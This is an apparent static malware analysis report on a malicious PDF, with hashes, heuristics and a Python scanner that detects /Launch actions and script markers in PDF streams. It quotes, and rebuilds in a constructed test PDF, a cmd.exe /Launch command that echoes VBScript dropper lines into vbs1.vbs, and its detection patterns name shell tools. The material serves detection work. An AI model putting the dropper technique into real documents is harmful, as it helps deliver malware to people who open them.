Malicious PDF — malware analysis report

Static analysis result for SHA-256 bd762e98bddca0e4…

Verdict: MALICIOUS
File type: PDF

Size: 2.09 MB
Created: 2010-10-28 10:43:50
Authoring application: FPDF 1.53
MD5: c41c0b9e91b027e798f576bf56b021ae
SHA-1: f2be325b4f5e41a54e34e988a64c5f1acf019238
SHA-256: bd762e98bddca0e4176e5a9281b3c2c69dd894eef5dec6af7a5761ef8ed58b92
Risk score: 190

Malware Insights

MITRE ATT&CK
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1204.002 User Execution: Malicious File
Note that the extracted /Launch command line invokes cmd.exe and writes a VBScript file; no PowerShell invocation is visible in the sample, so T1059.003 (Windows Command Shell) and T1059.005 (Visual Basic) describe the observed behaviour more precisely than T1059.001.

The critical PDF_LAUNCH heuristic fired: the document carries a /Launch action whose target is cmd.exe. Its parameter string runs cmd.exe /c with a chain of echo commands whose output is redirected into a file named vbs1.vbs, so the command line itself writes a VBScript dropper to disk line by line. The visible fragment of that script creates an ADODB.Stream object, which VBScript droppers commonly use to write binary data to disk, indicating that further stages are being staged even though the extracted command line is truncated. The ML classifier independently scored the file as malicious with high confidence (0.9996).

Machine Learning

  • Nyx PDF Classifier: malicious score 0.9996

Heuristics (3)

  • Launch action (critical, PDF_LAUNCH)
    The PDF contains a /Launch action whose target is an executable, URL, or UNC path; such an action can start an external application when the document is opened.
  • /Launch action target: cmd.exe (critical, PDF_LAUNCH_COMMAND)
    The /Launch action specifies an executable target with the parameters '/c echo Dim BinaryStream > vbs1.vbs && echo Set BinaryStream = CreateObject("ADODB.Stream"' (truncated in the extracted data); the target is a known-dangerous executable (cmd, PowerShell, etc.).
  • Embedded script payload in PDF stream (high, PDF_EMBEDDED_SCRIPT_PAYLOAD)
    Stream bytes contain script-execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is a stronger signal than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
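The three heuristics above, and the carving of the script stream listed under Extracted artifacts, can be reproduced with a small static scanner. The following is an added example written for this page; it is not the analysis platform's own code. It assumes a constructed sample PDF (embedded inline, not the analysed file) containing a /Launch action that has cmd.exe echo a VBScript dropper into vbs1.vbs, plus a FlateDecode stream carrying the script body. The scanner works on raw bytes without parsing the xref table, decodes only FlateDecode streams, and does not handle object streams, hex strings or octal escapes; a production tool would need those.

```python
import re
import zlib

# Launch targets that a benign document has no business pointing at.
DANGEROUS_TARGETS = re.compile(
    r'(?:^|[\\/"])(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32)(?:\.exe)?(?:\s|$)', re.I)
# Script-execution primitives that mark a staged payload inside stream bytes.
SCRIPT_MARKERS = re.compile(
    rb'(CreateObject|ActiveXObject|WScript\.Shell|ADODB\.Stream|Shell\.Application|powershell)', re.I)

# Constructed sample (not the analysed file): a /Launch action that makes cmd.exe echo a VBScript
# dropper into vbs1.vbs, plus a FlateDecode stream carrying the script body.
SCRIPT_BODY = (b'Dim BinaryStream\r\nSet BinaryStream = CreateObject("ADODB.Stream")\r\n'
               b'BinaryStream.Type = 1\r\n')
_deflated = zlib.compress(SCRIPT_BODY)
SAMPLE_PDF = (
    b'%PDF-1.4\n'
    b'1 0 obj << /Type /Catalog /OpenAction 4 0 R >> endobj\n'
    b'4 0 obj << /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c echo Dim BinaryStream '
    b'> vbs1.vbs && echo Set BinaryStream = CreateObject\\("ADODB.Stream"\\) >> vbs1.vbs) >> >> endobj\n'
    b'5 0 obj << /Length ' + str(len(_deflated)).encode() + b' /Filter /FlateDecode >>\nstream\n'
    + _deflated + b'\nendstream\nendobj\ntrailer << /Root 1 0 R >>\n%%EOF\n')

def read_literal_string(data, start):
    """Decode the PDF literal string whose '(' is at data[start]; returns (bytes, end_index)."""
    depth, out, i = 0, bytearray(), start + 1
    while i < len(data):
        c = data[i:i + 1]
        if c == b'\\':                       # backslash escape: \( \) \\ \n \r \t (octal not handled)
            nxt = data[i + 1:i + 2]
            out += {b'n': b'\n', b'r': b'\r', b't': b'\t'}.get(nxt, nxt)
            i += 2
            continue
        if c == b'(':                        # balanced parens may nest without escaping
            depth += 1
        elif c == b')':
            if depth == 0:
                return bytes(out), i + 1
            depth -= 1
        out += c
        i += 1
    raise ValueError('unterminated literal string')

def find_launch_actions(pdf):
    """Return [(target, parameters)] for every /S /Launch action dictionary in the file."""
    found = []
    for m in re.finditer(rb'/S\s*/Launch\b', pdf):
        body = pdf[m.end():].split(b'endobj', 1)[0]      # rest of this action's object
        vals = {}
        for key in (b'/F', b'/P'):           # /F: file or executable, /P: its parameters
            km = re.search(key + rb'\s*\(', body)
            if km:
                vals[key] = read_literal_string(body, km.end() - 1)[0].decode('latin-1')
        found.append((vals.get(b'/F'), vals.get(b'/P')))
    return found

def is_dangerous_target(target):
    return bool(target and DANGEROUS_TARGETS.search(target.strip()))

def extract_streams(pdf):
    """Return [(file_offset, data)] for every stream; FlateDecode streams are inflated."""
    streams = []
    for m in re.finditer(rb'stream\r?\n', pdf):
        if pdf[m.start() - 3:m.start()] == b'end':      # matched the 'endstream' keyword
            continue
        header = pdf[max(pdf.rfind(b' obj', 0, m.start()), 0):m.start()]
        start = m.end()
        ln = re.search(rb'/Length\s+(\d+)(?!\s*\d+\s*R)', header)  # direct /Length only
        if ln:
            raw = pdf[start:start + int(ln.group(1))]
        else:                                            # fall back to the endstream keyword
            raw = pdf[start:].split(b'endstream', 1)[0]
            raw = raw[:-2] if raw.endswith(b'\r\n') else raw[:-1] if raw[-1:] in (b'\r', b'\n') else raw
        try:
            data = zlib.decompress(raw) if b'/FlateDecode' in header else raw
        except zlib.error:
            data = raw                                   # corrupt or evasive: scan raw bytes anyway
        streams.append((start, data))
    return streams

def scan_script_markers(pdf):
    """Return [(stream_offset, marker, context)] for script markers found in decoded streams."""
    hits = []
    for offset, data in extract_streams(pdf):
        for mm in SCRIPT_MARKERS.finditer(data):
            hits.append((offset, mm.group(1).decode('latin-1'), data[max(0, mm.start() - 24):mm.end() + 24]))
    return hits

def triage(pdf):
    """Map what was found onto the heuristic names used in the report."""
    launches = find_launch_actions(pdf)
    verdict = ['PDF_LAUNCH'] if launches else []
    if any(is_dangerous_target(t) for t, _ in launches):
        verdict.append('PDF_LAUNCH_COMMAND')
    if scan_script_markers(pdf):
        verdict.append('PDF_EMBEDDED_SCRIPT_PAYLOAD')
    return verdict
```

Calling triage(SAMPLE_PDF) returns all three heuristic names; find_launch_actions returns the decoded cmd.exe parameter string with the escaped parentheses restored, and extract_streams gives the file offset and inflated bytes of the script stream, which is what the carved embedded_pdf_script_*.bin artifact corresponds to. The literal-string parser matters more than it looks: droppers routinely escape or nest parentheses in /P so that naive regex extraction sees a harmless prefix.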

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: embedded_pdf_script_0000057b.bin
SHA-256:  40abd21cc16d7f47deccc3a181fad013ee9391fed16bacfc36cd3459490f7ecc
Kind:     pdf-embedded-script
Source:   PDF decompressed stream script payload at offset 0x57B
Size:     90 bytes